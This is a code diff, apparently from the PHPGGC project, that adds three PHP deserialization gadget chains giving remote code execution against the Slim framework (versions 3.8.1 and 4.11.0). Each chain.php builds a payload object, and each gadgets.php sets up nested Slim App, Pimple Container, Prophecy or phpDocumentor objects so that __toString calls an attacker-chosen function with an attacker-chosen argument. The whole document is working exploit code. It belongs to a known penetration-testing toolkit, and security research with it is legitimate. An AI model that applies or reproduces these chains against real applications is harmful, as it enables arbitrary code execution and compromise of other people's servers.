ambionics · CyanM0un · Sep 15, 2023 · Sep 15, 2023 · Sep 15, 2023 · Sep 15, 2023
diff --git a/gadgetchains/Slim/RCE/2/chain.php b/gadgetchains/Slim/RCE/2/chain.php
@@ -0,0 +1,18 @@
+<?php
+
+namespace GadgetChain\Slim;
+
+class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '3.8.1';
+    public static $vector = '__toString';
+    public static $author = 'CyanM0un';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+
+        return new \Prophecy\Argument\Token\ExactValueToken($function, $parameter);
+    }
+}
diff --git a/gadgetchains/Slim/RCE/2/gadgets.php b/gadgetchains/Slim/RCE/2/gadgets.php
@@ -0,0 +1,54 @@
+<?php
+
+namespace Pimple
+{
+    class Container
+    {
+        private $raw;
+        private $values;
+        private $keys;
+
+        function __construct($array)
+        {
+            $this->keys = $this->raw = $this->values = $array;
+        }
+    }
+}
+
+namespace Slim
+{
+    class App
+    {
+        private $container;
+
+        function __construct($container)
+        {
+            $this->container = $container;
+        }
+    }
+
+    class Container extends \Pimple\Container
+    {
+
+    }
+}
+
+namespace Prophecy\Argument\Token
+{
+    use \Slim\App;
+    use \Slim\Container;
+
+    class ExactValueToken
+    {
+        private $util;
+        private $value;
+
+        function __construct($function, $parameter)
+        {
+            $z = new App(new Container(['has' => $function]));
+            $y = new App($z);
+            $this->util = new App(new Container(['stringify' => [$y, $parameter]]));
+            $this->value = $parameter;
+        }
+    }
+}
diff --git a/gadgetchains/Slim/RCE/3/chain.php b/gadgetchains/Slim/RCE/3/chain.php
@@ -0,0 +1,18 @@
+<?php
+
+namespace GadgetChain\Slim;
+
+class RCE3 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '3.8.1';
+    public static $vector = '__toString';
+    public static $author = 'CyanM0un';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+
+        return new \phpDocumentor\Reflection\DocBlock\Tags\Method($function, $parameter);
+    }
+}
diff --git a/gadgetchains/Slim/RCE/3/gadgets.php b/gadgetchains/Slim/RCE/3/gadgets.php
@@ -0,0 +1,53 @@
+<?php
+
+namespace Pimple
+{
+    class Container
+    {
+        private $raw;
+        private $values;
+        private $keys;
+
+        function __construct($array)
+        {
+            $this->keys = $this->raw = $this->values = $array;
+        }
+    }
+}
+
+namespace Slim
+{
+    class App
+    {
+        private $container;
+
+        function __construct($container)
+        {
+            $this->container = $container;
+        }
+    }
+
+    class Container extends \Pimple\Container
+    {
+
+    }
+}
+
+namespace phpDocumentor\Reflection\DocBlock\Tags
+{
+    use \Slim\App;
+    use \Slim\Container;
+
+    class Method
+    {
+        private $arguments = [];
+        protected $description;
+
+        function __construct($function, $parameter)
+        {
+            $z = new App(new Container(['has' => $function]));
+            $y = new App($z);
+            $this->description = new App(new Container(['render' => [$y, $parameter]]));
+        }
+    }
+}
diff --git a/gadgetchains/Slim/RCE/4/chain.php b/gadgetchains/Slim/RCE/4/chain.php
@@ -0,0 +1,18 @@
+<?php
+
+namespace GadgetChain\Slim;
+
+class RCE4 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '4.11.0';
+    public static $vector = '__toString';
+    public static $author = 'CyanM0un';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+
+        return new \Prophecy\Argument\Token\ExactValueToken($function, $parameter);
+    }
+}
diff --git a/gadgetchains/Slim/RCE/4/gadgets.php b/gadgetchains/Slim/RCE/4/gadgets.php
@@ -0,0 +1,28 @@
+<?php
+namespace Prophecy\Argument\Token
+{
+    class ExactValueToken
+    {
+        private $util;
+        private $value;
+
+        function __construct($function, $parameter)
+        {
+            $this->util = new \AdrianSuter\Autoload\Override\ClosureHandler($function);
+            $this->value = $parameter;
+        }
+    }
+}
+
+namespace AdrianSuter\Autoload\Override
+{
+    class ClosureHandler
+    {
+        private $closures;
+
+        function __construct($function)
+        {
+            $this->closures = ["stringify"=>$function];
+        }
+    }
+}